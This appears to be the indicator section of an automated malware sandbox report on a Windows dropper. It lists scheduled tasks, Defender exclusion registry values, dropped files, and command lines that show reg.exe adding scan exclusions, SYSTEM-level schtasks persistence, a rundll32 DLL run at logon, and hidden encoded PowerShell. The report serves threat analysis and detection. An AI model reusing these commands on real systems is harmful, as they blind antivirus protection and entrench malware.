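Technical Information
The section labels of the original report are not present in this copy. In order, the entries below are: scheduled-task files (`.job` files and entries under `tasks`), registry values under the Windows Defender `Exclusions\Paths` keys, file and process names, and process command lines. The excluded directories are the same ones that hold the executables, script and DLL listed further down, so on an affected host those files sit in paths exempted from Defender scanning. The values shown as '0' and '00000000' both appear to be the REG_DWORD 0 written by the `reg.exe ADD ... /t REG_DWORD /d 0` commands in the command-line list.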
- %WINDIR%\tasks\brgxlshycwforrjkxv.job
- <SYSTEM32>\tasks\brgxlshycwforrjkxv
- <SYSTEM32>\tasks\gydbvtuqg
- %WINDIR%\tasks\kzwsmuewgdzrfaszo.job
- <SYSTEM32>\tasks\kzwsmuewgdzrfaszo
- %WINDIR%\tasks\jmujdbobhzvnipm.job
- <SYSTEM32>\tasks\jmujdbobhzvnipm
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- firefox.exe
- %TEMP%\7zs7f39.tmp\simplinst.exe
- %TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe
- %WINDIR%\temp\snbxnexcbhobfzmo\aywbvjoy\jgdxujzslscpmvke.wsf
- %WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe
- %ProgramFiles(x86)%\olvlbwuyu\yrbtzn.dll
- <SYSTEM32>\tasks\gydbvtuqg
- %WINDIR%\temp\snbxnexcbhobfzmo\aywbvjoy\jgdxujzslscpmvke.wsf
- %WINDIR%\tasks\brgxlshycwforrjkxv.job
- <SYSTEM32>\tasks\brgxlshycwforrjkxv
- %HOMEPATH%\ntuser.pol
- %PROGRAMDATA%\ntuser.pol
- '%TEMP%\7zs7f39.tmp\simplinst.exe' /S /te "HDRD8DDRD6DDRD4ZCRD7FFRD0YFRD4YFRD2VDRD7GDRD4LDRD7SDRD2ADRD3ZFRD8RCRD8SDRD4DDRD3QDRD6MDRD5KDRD2ZFRD1QDRD7MDRD3KDRD9YFRD2TDRD6MDRD9EDRD6NDRD7LDRD4MDRD5ODRD2TDRD9ADRD3YFRD2ADRD5MDRD8VDRD7...
- '%TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe' es /S
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\snbxnEXCbHoBfzMo\AywBVjoy\jGdXUJZsLsCPmvkE.wsf"
- '%WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe' ad /S
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe' es /S' (with hidden window)
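- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
  (The -EncodedCommand value is Base64 over UTF-16LE text and decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate.exe launch in the next entry.)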
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe' ad /S' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bRgxlshYcWfORrJKxv" /SC once /ST 13:15:00 /RU "SYSTEM" /TR "\"%TEMP%\sPwuVezNkSqeTnuRg\peUjdJpKBAXhADP\AGUOHEB.exe\" es /S" /V1 /F
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "KZwSMuewGDzrfASZo" /SC once /ST 02:04:51 /RU "SYSTEM" /TR "\"%WINDIR%\Temp\snbxnEXCbHoBfzMo\lyMedpUGzVhIYdO\FalEtmN.exe\" ad /S" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "KZwSMuewGDzrfASZo"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gYdbvtuqg"
- '<SYSTEM32>\taskeng.exe' {9C1E3D82-0E71-4B99-B901-C8DCC487DDDC} S-1-5-21-1960123792-2022915161-3775307078-1001:nviuncwke\user:Interactive:[1]
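- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (The -EncodedCommand value is Base64 over UTF-16LE text and decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate.exe launch in the next entry.)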
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gYdbvtuqg"
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bRgxlshYcWfORrJKxv"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\snbxnEXCbHoBfzMo\AywBVjoy\jGdXUJZsLsCPmvkE.wsf"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32
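- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gYdbvtuqg" /SC once /ST 12:43:54 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
  (The command line is truncated in the report. The visible part of the encoded string is the same prefix as the full -EncodedCommand value listed elsewhere on this page, which decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`. The same task name also appears in the `schtasks.exe /run` and `schtasks.exe /DELETE` entries, so the task is created, run, and then removed.)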
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\oLvlbWUyU\yrBtZn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jMUjDBOBHzVNIPM" /V1 /F